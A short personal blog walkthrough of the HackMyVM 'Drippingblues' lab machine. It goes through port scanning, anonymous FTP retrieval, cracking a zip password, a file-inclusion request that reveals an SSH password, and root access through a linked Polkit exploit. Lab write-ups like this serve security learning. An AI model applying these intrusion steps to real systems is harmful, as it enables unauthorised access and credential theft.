Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Drippingblues Walkthrough

HackMyVm Drippingblues Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Drippingblues

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100                
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxrwxrwx    1 0        0             471 Sep 19 18:57 respectmydrip.zip [NSE: writeable]
 | ftp-syst:                                                                  
 |   STAT:                                                                    
 | FTP server status:                                                          
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII                                                                                                                                          
 |      No session bandwidth limit
 |      Session timeout in seconds is 300                      
 |      Control connection is plain text                        
 |      Data connections will be plain text                      
 |      At session startup, client count was 4      
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
 |   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
 |_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 2 disallowed entries  
 |_/dripisreal.txt /etc/dripispowerful.html
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 


Enum port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 200) [Size: 138]
 /robots.txt           (Status: 200) [Size: 78]


Check index.php, get 2 user names.

 ~ curl http://192.168.56.100/index.php  
 <html>
 <body>
 driftingblues is hacked again so it's now called drippingblues. :D hahaha
 <br>
 by
 <br>
 travisscott & thugger
 </body>
 </html>⏎              


Check robots.txt,  get a text file and a local html file.

 ~ curl http://192.168.56.100/robots.txt
 User-agent: *
 Disallow: /dripisreal.txt
 Disallow: /etc/dripispowerful.html


Login ftp anonymous, download respectmydrip.zip. Bruteforce the zip pass.

 ~ fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt respectmydrip.zip
 PASSWORD FOUND!!!!: pw == 072528035


Unzip respectmydrip.zip, in respectmydrip.txt, get hint.

 ~ cat respectmydrip.txt
 just focus on "drip"⏎  


Fuzz index.php with param drip=/etc/dripispowerful.html. Get a password string.

 ~ curl 'http://192.168.56.100/index.php?drip=/etc/dripispowerful.html'     
 <!DOCTYPE html>
 <html>
 ...
 </style>
 password is:
 imdrippinbiatch
 ...


Try username thugger we got from index.php. Successfully login ssh.

 ~ ssh thugger@192.168.56.100                                                                             ...
 thugger@drippingblues:~$ id
 uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)


The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

 root@drippingblues:/home/thugger# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 drippingblues




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1